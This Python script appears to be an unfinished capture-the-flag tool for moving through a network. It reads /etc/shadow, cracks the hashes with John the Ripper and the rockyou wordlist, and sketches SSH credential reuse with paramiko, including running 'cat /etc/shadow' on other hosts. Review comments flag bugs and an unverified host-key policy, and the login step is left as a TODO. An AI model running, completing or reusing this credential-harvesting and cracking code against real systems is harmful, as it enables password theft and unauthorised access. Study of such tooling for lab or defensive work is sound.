import os
import queue
import subprocess
import sys
import threading
import time

import paramiko
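# Interpreter guard. NOTE(review): on Python 2 the earlier `import queue`
# would normally fail first, so this check is a courtesy rather than a
# guarantee.
if sys.version_info < (3, 0):
    print("Must be run with python3")
    # Exit non-zero so a calling shell can tell the check failed.
    sys.exit(1)

##### Globals
# Per-host state, keyed by an integer host number.
COMPUTER = {}
# Local addresses; the main section stores each one as a key with value 0.
IP = {}

# Shared work lists read by the worker threads.
# presumably CRED holds (username, password) pairs -- confirm against producer
CRED = []
# File numbers queued by load_shadow().
CRACKABLE = []

Computer_Number = 0


FLAG_FOUND = False
Q = queue.Queue()
# Entry 0 is filled in by the main section from the local machine
# (its servers.txt list and its /etc/shadow read).
COMPUTER[0] = {
    "reachable": [],
    "reached": [],
    "access": None,
    "credentials": None,
    "root": False,
}

##### Helpers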
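class john(threading.Thread):
    """Worker thread that takes entries off CRACKABLE and invokes ``john``.

    The loop polls the module-level CRACKABLE list every 0.25 s until
    timeout() is called.
    """

    def __init__(self):
        super().__init__()
        # Initialised here instead of in run(): a timeout() that arrives
        # before the thread is scheduled must not be overwritten, otherwise
        # the loop never ends and join() blocks forever.
        self.running = True

    def timeout(self):
        """Ask the loop in run() to stop after its current iteration."""
        self.running = False

    def run(self):
        """Poll CRACKABLE until timeout() clears ``running``."""
        while self.running:
            if CRACKABLE:
                file = CRACKABLE.pop()
                rip = subprocess.Popen(
                    ["john", "--wordlist=~/rockyou.txt", "--pot=./john.pot"],
                    stdout=subprocess.PIPE,
                )
                # NOTE(review): the child is never waited on, so poll() here
                # almost always returns None and the else branch runs; the
                # process and its stdout pipe are also left unreaped.
                if rip.poll() == 0:
                    # NOTE(review): CRACKABLE entries are the integers queued
                    # by load_shadow(), so this concatenation would raise
                    # TypeError if reached; the output is read but never
                    # stored anywhere.
                    (output, err) = subprocess.Popen(
                        ["john", "shadows/"+file, "--show", "--pot=./john.pot"],
                        stdout=subprocess.PIPE,
                    ).communicate()
                else:
                    print("Error cracking %s" % file)

            time.sleep(.25)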
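class cred(threading.Thread):
    """Worker thread that reacts when the CRED list grows.

    Each time the length of CRED changes, it walks COMPUTER and, for every
    host that has an ``access`` value but no ``root`` flag, iterates the
    known credentials. The actual login step is still a TODO in the source.

    The original body referenced ``cred``, ``Computer`` and ``Credentials``,
    none of which is a usable name here (``cred`` is this class); the
    module-level CRED and COMPUTER are assumed to be what was meant.
    """

    def __init__(self):
        super().__init__()
        # Initialised here instead of in run() so that an early timeout()
        # is not overwritten when the thread starts.
        self.running = True

    def timeout(self):
        """Ask the loop in run() to stop after its current iteration."""
        self.running = False

    def run(self):
        """Poll CRED until timeout() clears ``running``."""
        num_creds = 0
        while self.running:
            # Nothing new since the last pass: idle briefly.
            if len(CRED) == num_creds:
                time.sleep(.25)
                continue
            num_creds = len(CRED)
            for Comp_Num in COMPUTER:
                entry = COMPUTER[Comp_Num]
                if entry["root"] == False and entry["access"] != None:
                    ssh_client = paramiko.SSHClient()
                    # NOTE(review): AutoAddPolicy accepts any unknown host key
                    # without verification, so the peer's identity is never
                    # checked. Tooling that handles real credentials should
                    # load known host keys and use paramiko.RejectPolicy.
                    ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
                    # presumably (username, password) pairs -- confirm
                    for username, password in CRED:
                        try:
                            print("TODO")
                            # ssh_client.connect(hostname=,username=username,password=password)
                            # stdin,stdout,stderr=ssh_client.exec_command("cat /etc/shadow")
                            # if stderr.readlines() == []:
                            # Computer[Comp_Num]["root"] = True
                            # load_shadow(stdin.read())
                            # break
                        except Exception as e:
                            print(e)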
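def load_servers(fileContent):
    """Parse ``host:port`` lines into a list of ``[host, port]`` pairs.

    Args:
        fileContent: Text of the server list, one ``host:port`` per line.

    Returns:
        A list of two-element lists ``[host, port]``; both items are
        strings. Blank lines and lines that do not split into exactly two
        non-empty parts on ``:`` are skipped. An empty list is returned
        (after printing an error) when *fileContent* is not a string, so
        callers can always iterate the result.
    """
    if not isinstance(fileContent, str):
        print("Error parsing servers.txt:" + "expected str, got "
              + type(fileContent).__name__)
        return []

    servers = []
    # splitlines() also copes with CRLF files, which would otherwise leave
    # a stray "\r" glued to the port.
    for line in fileContent.splitlines():
        entry = line.strip()
        if not entry:
            continue
        try:
            ip, port = entry.split(":")
        except ValueError:
            # Not exactly one ":" -- malformed line, ignore it.
            continue
        if not ip or not port:
            continue
        servers.append([ip, port])
    return servers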
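def load_shadow(fileContent):
    """Write *fileContent* to ``shadows/<n>`` and queue ``n`` in CRACKABLE.

    ``n`` is the running counter kept in ``load_shadow.filenumber``; it is
    incremented on every call, whether or not the write succeeded. On
    success the function also sets ``COMPUTER[0]["root"]`` to True.

    Args:
        fileContent: Text to store (the callers pass shadow-file contents).

    NOTE(review): the root flag is always set on entry 0, regardless of
    which host the content came from -- confirm that is intended.
    """
    number = load_shadow.filenumber
    path = 'shadows/%d' % number
    try:
        # The content is password-hash material: create the file owner-only
        # instead of inheriting the process umask, and tighten the mode in
        # case the file already existed with wider permissions.
        fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
        with os.fdopen(fd, 'w') as file:
            os.chmod(path, 0o600)
            file.write(fileContent)
        CRACKABLE.append(number)
        COMPUTER[0]["root"] = True
    except Exception as e:
        print("Error writing to directory: "+str(e))
    load_shadow.filenumber += 1


# Function attribute used as the file counter.
load_shadow.filenumber = 0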
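# p = subprocess.Popen(["john", "--wordlist=~/rockyou.txt", "--pot=./john.pot"], stdout=subprocess.PIPE)
##### Start Main
# The files written under shadows/ hold password hashes, so request an
# owner-only directory. The mode is applied only when the directory is
# created; an existing directory keeps its permissions.
try:
    os.makedirs("shadows", mode=0o700, exist_ok=True)
except OSError as e:
    print("Error creating shadows directory: " + str(e))

#Get ips of host
try:
    # shell=True is needed for the "||" fallback; the command is a fixed
    # string with no external input.
    (output, err) = subprocess.Popen(["hostname --all-ip-addresses || hostname -I"], stdout=subprocess.PIPE, shell=True).communicate()
    # split() with no argument tolerates whatever trailing whitespace the
    # command prints; slicing off a fixed two characters could cut a digit.
    for ip in output.decode('utf-8').split():
        IP[ip] = 0
except Exception as e:
    print("Error determining ip address: "+str(e))

# ~/servers.txt
with open("servers.txt") as file:
    COMPUTER[0]["reachable"] = load_servers(file.read())
Q.put(0)

# Attempt to read etc/shadow
try:
    with open('/etc/shadow') as file:
        load_shadow(file.read())
        # Was a no-op comparison (==) in the original.
        COMPUTER[0]["root"] = True
except Exception as e:
    # Was "except exception", which raises NameError instead of handling
    # the failed read.
    print(e)
    # NOTE(review): placement inferred -- the paste lost its indentation.
    print("Actually handle this case")

try:
    with open('/flag.txt') as file:
        print("found flag")
except OSError:
    pass


John_Thread = john()
Cred_Thread = cred()

John_Thread.start()
Cred_Thread.start()

Tunn_Threads = []

# while Q.qsize() != 0:
# Computer = Computers(Q.pop())
# for ip, port in Computer["reachable"]:
# if ip in Computer["reached"]:
# continue
# for username, password in Credentials:
# # Attempt log ins
# Print("TODO")
# # Create tunnel
# if(len(Computer["reached"]) != len(Computer["reachable"])):
# Q.put(Computer)
# time.sleep(.25)

# NOTE(review): nothing in the visible code ever appends to CRED, so as
# written this wait does not end.
while len(CRED) == 0:
    time.sleep(.25)

John_Thread.timeout()
Cred_Thread.timeout()
for T in Tunn_Threads:
    print("TODO")

John_Thread.join()
Cred_Thread.join()
for T in Tunn_Threads:
    T.join()


print(COMPUTER)
print(IP)

# NOTE(review): this writes the collected credentials to stdout in clear
# text; anything capturing the output (terminal scrollback, logs) keeps them.
print(CRED)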